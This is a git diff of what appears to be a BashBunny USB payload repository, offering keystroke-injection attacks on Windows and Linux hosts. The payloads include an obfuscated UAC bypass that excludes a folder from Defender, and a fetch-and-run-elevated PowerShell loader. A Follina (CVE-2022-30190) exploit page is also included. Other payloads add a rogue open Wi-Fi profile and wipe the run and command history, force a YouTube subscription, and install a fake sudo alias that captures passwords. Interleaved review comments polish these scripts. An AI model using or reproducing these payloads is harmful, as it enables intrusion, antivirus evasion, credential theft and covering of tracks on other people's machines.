Project Link: (https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-SafeHaven)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>


@ -0,0 +1,23 @@
REM Title: Safe-Haven
REM Author: I am Jakoby
REM Description: This is a UAC bypass payload that will open an elevated powershell console
REM Next a Directory called "safe" will be generated in your Documents Directory
REM The "safe" directory will be added to the Window's Defender Exclusion list
REM The AntiVirus will ignore all files downloaded to or ran from here
REM Target: Windows 10, 11
DELAY 500
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 1000
STRING & ( $PShoME[21]+$psHOME[30]+'x')(NEw-objECt IO.COMpresSiON.DeflATESTrEAm([sYStEm.io.MeMOrySTreAm] [SYSTEM.CONVERT]::fROMBase64StRing('hZFPT8JAEMW/yqbxWiDqwYRweFvKtipiLRAhvdTusBj6L93qop/eXRKNXvCyyWTe+72Z2YvFXEy8tjHU6T2V5YCOxHzD9sx/aB7dU8fMD49UMP7R5lozn+qC3YIbiBASvMF0hFjhgHCFF8UvMW2wTvjS1SvFE8xiLA0XCA9Ygs8wM3gCf4eYQya8hzj5RojmeAb/dNyt4iWCGAvj+hpb8BZRjBg2JwI2idUL5focIrF99AhHKGDzrG6b8MpxC8cR19gYxwPuE5sfKVdrRLZvLFfcuPzkZx+r+7MfJhNv3JFiuZTMi+6CVZY2u97kHWVBaW9COhs0lcpSd8Fs0VKdFU1V5bX02FCyC3tjNtz9h6i0r6nvX2uls+CtW1N3cnsO7Tn/rpE2oKXOfdI47fOu99OSqGW+ZlcnvKSSejo7pPc9ynnt72lOli8=' ),[SYsTEM.io.cOmpressION.coMPRESsiOnmode]::DEcOMPRESS )| FoREACh-object{NEw-objECt SySTeM.Io.StreaMreadER( $_ ,[System.teXT.EnCoDINg]::ASCiI) }|foReaCh-objEct {$_.ReAdToEND()} );exit
ENTER


@ -0,0 +1,21 @@
REM Title: UrAttaControl
REM Author: I am Jakoby
REM Description: This is a UAC bypass payload that will open an elevated powershell console and run any script.
REM Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details
REM Target: Windows 10, 11
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
LED STAGE1
QUACK ${SWITCH_POSITION}/SafeHaven.txt
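Review bot: The header of this payload is copied from UrAttaControl: the Title and Description name UrAttaControl and talk about replacing a URL, while the last line quacks `SafeHaven.txt`, which has no URL. It also uses `REM` for comments, whereas the PineApple and Subscribe payload.txt files in this commit use `#`; if payload.txt is run by bash, as those files suggest, each `REM` line is a failed command rather than a comment. Suggested first line: `# Title: Safe-Haven`, with the rest of the header rewritten likewise. `LED STAGE1` is issued twice, so the second was presumably meant to be `LED STAGE2`, and there is no `LED FINISH`; the UrAttaControl and PineApple payload.txt files repeat the same LED sequence.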


@ -0,0 +1,104 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# UrAttaControl
A script used to open an elevated powershell console and execute admin level commands
## Description
Completely ran from the execute file. Replace the URL in that file with yours leading to a base64 script
This script will use IEX to download a base64 script to the $Payload variable
Using a keystroke injections attack a heavily obfuscated and encoded snippet will download and execute any base64
script saved in the $Payload variable
This payload completely bypasses the UAC and will run any admin level script without a prompt
You can use this function I wrote to convert your .ps1 sscripts to Base64
https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* A keystroke injection based payload will run
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-UrAttaControl)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>


@ -0,0 +1,30 @@
REM Title: UrAttaControl
REM Author: I am Jakoby
REM Description: This is a UAC bypass payload that will open an elevated powershell console and run any script.
REM Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details
REM Target: Windows 10, 11
REM NOTES: Additionally instead of pulling down your script with IWR you can hardcode the Base64 script to the $Payload variable
REM EXAMPLE: $Payload = "cwB0AGEAcgB0ACAAbgBvAHQAZQBwAGEAZAA=" - This Base64 script will open notepad
REM You can use this function I wrote to convert your .ps1 sscripts to Base64
REM https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 1000
STRING $url = "YOUR-URL-WITH-BASE64-ENCODED-SCRIPT"
SHIFT ENTER
STRING $Payload = (Invoke-WebRequest $url'?dl=1').Content
SHIFT ENTER
STRING ( nEw-obJECt Io.cOMprEssion.dEfLAtEStreAM([iO.MEMoRysTream][coNVerT]::FrOMBasE64sTring( 'hY69CsIwFEZf5RK6ph0ci1MHBZEKQacsoflahfyRRKpvb1MQnOp2h3vOd6r+fNiz4GfEdIcxNV4gDjdQdVFv45Um1kZMpPRyHU/dVQo/5llFyM6olJBk7e0kRaFlH+Dk4K1VTjNqNFWLn5rxn8ImnpDzw01Jds94Q1xpVtSs8KPXy0BALIGtyCpmLgwQiCfarXoNg4zNSPZN2f79rVmRDw=='), [SySTEM.Io.cOmprEsSION.comprEsSiOnmOdE]::DECoMPress )| ForeAch{ nEw-obJECt IO.stReaMReAdEr( $_, [SYSTEm.TEXT.encODINg]::aSciI ) } |ForEaCh { $_.rEAdtoENd() } )|& ( $VeRBosEPreFEreNcE.tosTRING()[1,3]+'x'-joIN'')
SHIFT ENTER
STRING exit
ENTER
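Review bot: The REM header has two typos (`Reaplce` → `Replace`, `sscripts` → `scripts`) and disagrees with the README in this commit, which says the script is fetched with IEX while the `STRING $Payload = ...` line uses `Invoke-WebRequest`. Going by the description, whatever sits behind `$url` at run time is executed with admin rights and no check of its content, so the header should say the link must stay under the tester's control for the whole engagement. Alternatively it can recommend the hardcoded `$Payload` variant that the NOTES line already mentions, which keeps the executed script reviewable in the file. Proposed line: `REM Replace the URL below with a link you control; its content runs elevated and unverified`.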


@ -0,0 +1,21 @@
REM Title: UrAttaControl
REM Author: I am Jakoby
REM Description: This is a UAC bypass payload that will open an elevated powershell console and run any script.
REM Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details
REM Target: Windows 10, 11
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
LED STAGE1
QUACK ${SWITCH_POSITION}/UrAttaControl.txt


@ -0,0 +1,31 @@
# FollinaBunny
- Author: PanicAcid
- Version: 1.0
- Target: Windows (Powershell 5.1+)
- Category: Execution
- Attackmode: HID & RNDIS_ETHERNET
- Extensions: Run
- Props: Cribbit and 0xBacco
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |
## Description
Executes code leveraging CVE-2022-30190 aka Follina using a malicious html file hosted on the Bunny itself. Whilst this exploit can be called via a malicious word document, a simple wget via PowerShell will also execute the malicious code.. Tweak and well you get the picture.
This WILL flag on Defender if you're up to date, however the PoC here isn't that you can just run this code, it's that you can self serve this malicious html file via the BashBunny and you can tweak it to your hearts content.
Based on Cribbit's Moo payload https://github.com/hak5/bashbunny-payloads/blob/master/payloads/library/prank/Win_PoSH_AnsiSebsCow
Example payload taken from https://greynolds.me.uk/ - https://greynolds.me.uk/poc.html
## Colours
| Status | Colour | Description |
| -------- | ----------------------------- | --------------------------- |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Powershell script |
| FINISHED | Green blink followed by SOLID | Injection finished |


@ -0,0 +1,38 @@
<!doctype html>
<html lang="en">
<head>
<title>
Good thing we disabled macros
</title>
</head>
<body>
<p>
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.
Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.
Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignissim convallis ligula. Aenean quis felis dolor. In quis lectus massa. Pellentesque quis pretium massa. Vivamus facilisis ultricies massa ac commodo. Nam nec congue magna. Nullam laoreet justo ut vehicula lobortis.
Aliquam rutrum orci tortor, non porta odio feugiat eu. Vivamus nulla mauris, eleifend eu egestas scelerisque, vulputate id est. Proin rutrum nec metus convallis ornare. Ut ultricies ante et dictum imperdiet. Ut nisl magna, porttitor nec odio non, dapibus maximus nibh. Integer lorem felis, accumsan a dapibus hendrerit, maximus nec leo. Vestibulum porta, orci sed dignissim porta, sem justo porta odio, quis rutrum tortor arcu quis massa. Aenean eleifend nisi a quam faucibus, quis scelerisque lectus condimentum. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Proin non dui nec odio finibus molestie. Suspendisse id massa nunc. Sed ultricies et sapien vel fringilla.
</p>
<p>
Donec tincidunt ac justo et iaculis. Pellentesque lacinia, neque at consectetur porttitor, leo eros bibendum lorem, eu sollicitudin dolor urna pharetra augue. Pellentesque facilisis orci quis ante tempor, ac varius eros blandit. Nulla vulputate, purus eu consectetur ullamcorper, mauris nulla commodo dolor, in maximus purus mi eget purus. In mauris diam, imperdiet ac dignissim ut, mollis in purus. In congue volutpat tortor eu auctor. Nullam a eros lectus. Aenean porta semper quam ac lacinia. Curabitur interdum, nisl eu laoreet tempus, augue nisl volutpat odio, dictum aliquam massa orci sit amet magna.
Duis pulvinar vitae neque non placerat. Nullam at dui diam. In hac habitasse platea dictumst. Sed quis mattis libero. Nullam sit amet condimentum est. Nulla eget blandit elit. Nunc facilisis erat nec ligula ultrices, malesuada mollis ex porta. Phasellus iaculis lorem eu augue tincidunt, in ultrices massa suscipit. Donec gravida sapien ac dui interdum cursus. In finibus eu dolor sit amet porta. Sed ultrices nisl dui, at lacinia lectus porttitor ut.
Ut ac viverra risus. Suspendisse lacus nunc, porttitor facilisis mauris ut, ullamcorper gravida dolor. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus sollicitudin, arcu id sagittis facilisis, turpis dolor eleifend massa, in maximus sapien dui et tortor. Quisque varius enim sed enim venenatis tempor. Praesent quis volutpat lorem. Pellentesque ac venenatis lacus, vitae commodo odio. Sed in metus at libero viverra mollis sed vitae nibh. Sed at semper lectus.
</p>
<p>
Proin a interdum justo. Duis sed dui vitae ex molestie egestas et tincidunt neque. Fusce lectus tellus, pharetra id ex at, consectetur hendrerit nibh. Nulla sit amet commodo risus. Nulla sed dapibus ante, sit amet fringilla dui. Nunc lectus mauris, porttitor quis eleifend nec, suscipit sit amet massa. Vivamus in lectus erat. Nulla facilisi. Vivamus sed massa quis arcu egestas vehicula. Nulla massa lorem, tincidunt sed feugiat quis, faucibus a risus. Sed viverra turpis sit amet metus iaculis finibus.
Morbi convallis fringilla tortor, at consequat purus vulputate sit amet. Morbi a ultricies risus, id maximus purus. Fusce aliquet tortor id ante ornare, non auctor tortor luctus. Quisque laoreet, sem id porttitor eleifend, eros eros suscipit lectus, id facilisis lorem lorem nec nibh. Nullam venenatis ornare ornare. Donec varius ex ac faucibus condimentum. Aenean ultricies vitae mauris cursus ornare. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas aliquet felis vel nulla auctor, ac tempor mi mattis. Nam accumsan nisi vulputate, vestibulum nisl at, gravida erat. Nam diam metus, tempor id sapien eu, porta luctus felis. Aliquam luctus vitae tortor quis consectetur. In rutrum neque sit amet fermentum rutrum. Sed a velit at metus pretium tincidunt tristique eget nibh. In ultricies, est ut varius pulvinar, magna purus tristique arcu, et laoreet purus elit ac lectus. Ut venenatis tempus magna, non varius augue consectetur ut.
Etiam elit risus, ullamcorper cursus nisl at, ultrices aliquet turpis. Maecenas vitae odio non dolor venenatis varius eu ac sem. Phasellus id tortor tellus. Ut vehicula, justo ac porta facilisis, mi sapien efficitur ipsum, sit fusce.
</p>
<script>
location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../../../$(\\windows\\system32\\calc)/.exe\"";
</script>
</body>
</html>
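Review bot: The file has no comment saying what it is, so anyone who finds `payload.html` outside this directory sees only a lorem-ipsum page with a script tag. Add an HTML comment at the top, e.g. `<!-- PoC for CVE-2022-30190 (Follina); launches calc only; lab use -->`. The README already notes that Defender flags the file, so it is also worth stating there that a checkout of the repository may have it quarantined. It should add that hosts with the vendor fix applied, or with the ms-msdt protocol handler removed, should not be affected.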


@ -0,0 +1,38 @@
#!/bin/bash
# Title: PoC Follina Execution via BashBunny
# Description: Serves up a malicious website that leverages the current CVE-2022-30190 aka Follina
# Author: PanicAcid
# Version: 1.0
# Category: Execution
# Target: Windows (Powershell 5.1+)
# Attackmodes: RNDIS_ETHERNET HID
# Props: Based on Cribbit's Moo payload https://github.com/hak5/bashbunny-payloads/blob/master/payloads/library/prank/Win_PoSH_AnsiSebsCow
# Example payload taken from https://greynolds.me.uk/ - https://greynolds.me.uk/poc.html
# Notes: This WILL flag on Defender if you're up to date, however the PoC here isn't that you can just run this code, it's that you can self serve
# this malicious html file via the BashBunny and you can tweak it to your hearts content.
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
GET SWITCH_POSITION
GET HOST_IP
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
# disallow outgoing dns requests so server starts immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
# attack commences
LED ATTACK
QUACK DELAY 200
RUN WIN powershell.exe "wget http://$HOST_IP/payload.html"
QUACK DELAY 500
LED FINISH
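Review bot: `cd /root/udisk/payloads/$SWITCH_POSITION/` is unquoted and unchecked, so if it fails the HTTP server started a few lines later serves whatever the current directory happens to be to the attached host. Use `cd "/root/udisk/payloads/$SWITCH_POSITION/" || exit 1`. The script also leaves state behind: the background server keeps running after `LED FINISH` and the appended iptables rule is never removed. Record the server's PID and stop it once the request has been served, and undo the rule with `iptables -D OUTPUT -p udp --dport 53 -j DROP`. The `while ! nc -z localhost 80` loop has no upper bound and spins forever if the server fails to bind.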


@ -0,0 +1,80 @@
REM Title: PineApple
REM Description: This payload is meant to use powershell to add the network profile of your wifi pineapple to the targets PC and connect to it
REM This version is a direct key stroke injection attack
REM Author: I am Jakoby
REM Target: Windows 10, 11
DELAY 3000
REM If the wifi pineapple SSID is detected target PC will connect to it
GUI r
DELAY 500
STRING powershell
DELAY 500
ENTER
DELAY 1000
STRING $profilefile="Home.xml";
SHIFT ENTER
STRING $SSID="PineApple";
SHIFT ENTER
STRING $SSIDHEX=($SSID.ToCharArray() |foreach-object {'{0:X}' -f ([int]$_)}) -join''
SHIFT ENTER
DELAY 500
STRING $xmlfile="<?xml version=""1.0""?>
SHIFT ENTER
STRING <WLANProfile xmlns=""http://www.microsoft.com/networking/WLAN/profile/v1"">
SHIFT ENTER
STRING <name>$SSID</name>
SHIFT ENTER
STRING <SSIDConfig>
SHIFT ENTER
STRING <SSID>
SHIFT ENTER
STRING <hex>$SSIDHEX</hex>
SHIFT ENTER
STRING <name>$SSID</name>
SHIFT ENTER
STRING </SSID>
SHIFT ENTER
STRING </SSIDConfig>
SHIFT ENTER
STRING <connectionType>ESS</connectionType>
SHIFT ENTER
STRING <connectionMode>manual</connectionMode>
SHIFT ENTER
STRING <MSM>
SHIFT ENTER
STRING <security>
SHIFT ENTER
STRING <authEncryption>
SHIFT ENTER
STRING <authentication>open</authentication>
SHIFT ENTER
STRING <encryption>none</encryption>
SHIFT ENTER
STRING <useOneX>false</useOneX>
SHIFT ENTER
STRING </authEncryption>
SHIFT ENTER
STRING </security>
SHIFT ENTER
STRING </MSM>
SHIFT ENTER
STRING </WLANProfile>
SHIFT ENTER
STRING "
SHIFT ENTER
STRING $XMLFILE > ($profilefile)
SHIFT ENTER
STRING netsh wlan add profile filename="$($profilefile)"
SHIFT ENTER
STRING netsh wlan connect name=$SSID
SHIFT ENTER
STRING reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f; Remove-Item (Get-PSreadlineOption).HistorySavePath
DELAY 500
ENTER
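Review bot: The REM header does not say what the script leaves on, or removes from, the machine. It adds a WLAN profile with `authentication` open and `encryption` none that stays installed, and it writes `Home.xml` to the current directory. The last `STRING` deletes every value under `RunMRU` and the whole PSReadLine history file, not just the entries this run created. Add REM lines that state this and give the restore step, e.g. `REM Restore: netsh wlan delete profile name="PineApple"`, so a tested host is not left with an unencrypted profile.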


@ -0,0 +1,95 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# PineApple
A script used to connect a targets PC to your wifi PineApple
## Description
This program will generate an XML file that will be used to create a network profile for your Wifi PineApple.
The XML file will be manually entered into a powershell window
the powershell window and run box will be erased for a clean exit.
## Getting Started
### Dependencies
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* A one liner command in the run box will execute the script on the bash bunny
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-PineApple)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>


@ -0,0 +1,20 @@
# Title: PineApple
# Description: This payload is meant to use powershell to add the network profile of your wifi pineapple to the targets PC and connect to it
# Author: I am Jakoby
# Version: 1.0
# Category: General
# Attackmodes: HID, Storage
# Target: Windows 10, 11
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
LED STAGE1
QUACK ${SWITCH_POSITION}/PineApple.txt


@ -0,0 +1,93 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Subscribe
A script I put together to make your target subscribe to your youtube channel
## Description
This script is set to use powershell to open your youtube page in their browser where they will be prompted to follow you.
SPOILER: They will.
## Getting Started
### Dependencies
* Windows 10,11
* Your target will have to be signed into their youtube account
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* A one liner command in the run box will execute the script on the bash bunny
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-Subscribe)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>


@ -0,0 +1,38 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : Subscribe | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : General | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.DESCRIPTION
This program is designed to get your target to subscribe to your youtube channel
#>
#############################################################################################################################################
# Enter your youtube channel URL here, but you should test this script with my URL first ;D
$channel = "https://www.youtube.com/iamjakoby"
Add-Type -AssemblyName System.Windows.Forms
$o=New-Object -ComObject WScript.Shell
$url = -join($channel,"?sub_confirmation=1")
Start-Process $url
Start-Sleep -Seconds 3
[System.Windows.Forms.SendKeys]::SendWait('{TAB}'*2)
[System.Windows.Forms.SendKeys]::SendWait('{ENTER}')
Start-Sleep -Seconds 1
[System.Windows.Forms.SendKeys]::SendWait('%{F4}')
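Review bot: `$o=New-Object -ComObject WScript.Shell` is never used; the keystrokes go through `[System.Windows.Forms.SendKeys]`, so the line can be dropped. The `SendWait` calls are sent blind after a fixed `Start-Sleep -Seconds 3`: they land in whichever window has focus, and `'%{F4}'` closes that window, which may hold the user's unsaved work if the browser was slow to open. A comment above the SendKeys lines should say so, e.g. `# Keys go to the foreground window; Alt+F4 closes whatever has focus`.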


@ -0,0 +1,22 @@
# Title: Subscribe
# Description: This payload is meant to make your target subscribe to your youtube channel
# Author: I am Jakoby
# Version: 1.0
# Category: General
# Attackmodes: HID, Storage
# Target: Windows 10, 11
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Subscribe.ps1')"
QUACK ENTER
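Review bot: The path in the `QUACK STRING` line mixes escaped and unescaped backslashes: `payloads\\$SWITCH_POSITION\Subscribe.ps1`. Inside bash double quotes both forms end up as a single backslash, but only because `\S` is not an escape sequence; write both separators as `\\` so the line does not depend on that. The payload also ends without `LED FINISH`, unlike the Follina and Fake-sudo payloads in this commit.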


@ -0,0 +1,46 @@
# Fake sudo
- Title: Fake sudo
- Author: TW-D
- Version: 1.1
- Target: Linux
- Category: Phishing
## Description
1) Copies the "sudo" command spoofing program to the user's home directory.
2) Defines a new persistent "sudo" alias with the file "~/.bash_aliases".
3) When the user "sudoer" executes the command "sudo" in a terminal, the spoofing program :
- __By default__ retrieves the username and password and writes them to "/tmp/.sudo_password".
- __But__ this behavior can be changed in line 26 of the "sudo-phishing.sh" file.
4) The spoofing program deletes the "sudo" alias. Then it deletes itself.
## Configuration
From "payload.txt" change the values of the following constant :
```bash
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
```
From "sudo-phishing.sh" change the values of the following constants if necessary :
```bash
readonly MAXIMUM_ATTEMPTS=3
readonly ERROR_MESSAGE="sudo: ${MAXIMUM_ATTEMPTS} incorrect password attempts"
```
From "sudo-phishing.sh", change the payload if you wish :
```bash
##
# <YOUR-PAYLOAD>
##
/bin/echo "${USER}:${sudo_password}" > /tmp/.sudo_password
##
# </YOUR-PAYLOAD>
##
```


@ -0,0 +1,86 @@
#!/bin/bash
#
# Title: Fake-sudo
#
# Description:
# This program creates a fake "sudo"
# command by defining an persistent alias.
#
# Author: TW-D
# Version: 1.1
# Category: Phishing
# Target: Linux
# Attackmodes: HID and STORAGE
#
# TESTED ON
# ===============
# Ubuntu 20.04.4 LTS x86_64 (Xfce)
#
# STATUS
# ===============
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Yellow double blink ............................. STAGE2
# Yellow triple blink ............................. STAGE3
# Yellow quadruple blink .......................... STAGE4
# White fast blink ................................ CLEANUP
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
######## SETUP ########
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
udisk mount
######## ATTACK ########
LED ATTACK
Q DELAY 7000
Q CTRL-ALT t
Q DELAY 7000
LED STAGE2
Q STRING " cd /media/\${USER}/${BB_LABEL}/payloads/${SWITCH_POSITION}/"
Q ENTER
Q DELAY 1500
Q STRING " cp ./sudo-phishing.sh ~/.sudo_phishing.sh"
Q ENTER
Q DELAY 1500
LED STAGE3
Q STRING " chmod +x ~/.sudo_phishing.sh"
Q ENTER
Q DELAY 1500
Q STRING " printf \"\\nalias sudo='~/.sudo_phishing.sh'\\n\" >> ~/.bash_aliases"
Q ENTER
Q DELAY 1500
LED STAGE4
Q STRING " exit"
Q ENTER
Q DELAY 1500
######## CLEANUP ########
LED CLEANUP
sync
udisk unmount
######## FINISH ########
LED FINISH
shutdown -h 0


@ -0,0 +1,46 @@
#!/bin/bash
#
# Fake-sudo
#
# This program imitates the behavior
# of the "sudo" command.
#
if [ -z "${SUDO_PROMPT}" ]; then
readonly INPUT_MESSAGE="[sudo] password for ${USER}: "
else
readonly INPUT_MESSAGE="${SUDO_PROMPT}"
fi
readonly MAXIMUM_ATTEMPTS=3
readonly ERROR_MESSAGE="sudo: ${MAXIMUM_ATTEMPTS} incorrect password attempts"
attempts() {
/bin/echo -n "${INPUT_MESSAGE}"
read -r -s sudo_password
/bin/echo ""
